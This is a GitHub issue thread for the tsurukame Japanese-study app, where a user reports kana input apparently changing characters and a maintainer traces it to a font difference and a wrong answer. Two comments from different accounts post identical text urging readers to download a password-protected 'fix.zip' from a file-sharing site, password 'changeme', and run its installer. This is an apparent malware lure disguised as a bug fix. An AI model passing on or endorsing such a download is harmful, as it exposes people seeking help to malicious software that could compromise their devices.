### ISSUE TITLE
app switching character when entering

### ISSUE THREAD

**Issue by akmseattle** [davidsansome/tsurukame#750]
Hi, love the app! But I just started having a random problem that is preventing me from progressing. For at least one character, I enter it correctly but the app switches it to a different character and I can't correct it. It is changing ri to i. I have tried entering it with the hiragana keyboard, and also by entering the romaji, but each time it switches ri to i. I am on Level 2, and it has happened each time I try to type ri in this particular review session so I can't get anything correct that contains ri.

**Comment by UInt2048** [comment]
Could you upload photos demonstrating the problem and expected behavior?

**Comment by akmseattle** [comment]
Turns out I was getting the spelling wrong, lol, but it did this on a different one as well and it always lets me get things wrong generally! 
![IMG_4762](https://github.com/user-attachments/assets/489e47ff-a391-49da-9fc4-245eafb9d15c)
![IMG_4763](https://github.com/user-attachments/assets/6fb816e5-c950-48a7-9aed-39ef93498d4f)

**Comment by akmseattle** [comment]
Photo 1 is how I entered it and photo 2 is what it looked like when I pressed enter to put in the higher input field.

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by UInt2048** [comment]
@akmseattle Did you try submitting it? It looks like just a font difference to me

**Comment by akmseattle** [comment]
Yes, I get the answer wrong. That’s how I noticed it at first. I kept getting things wrong I thought I had right.

**Comment by akmseattle** [comment]
FYI just uninstalled and reinstalled the app but the problem persists. I will be so sad if I can’t use my phone to get through my pile of reviews anymore!

**Comment by UInt2048** [comment]
@akmseattle The answer is wrong because it should be ちから
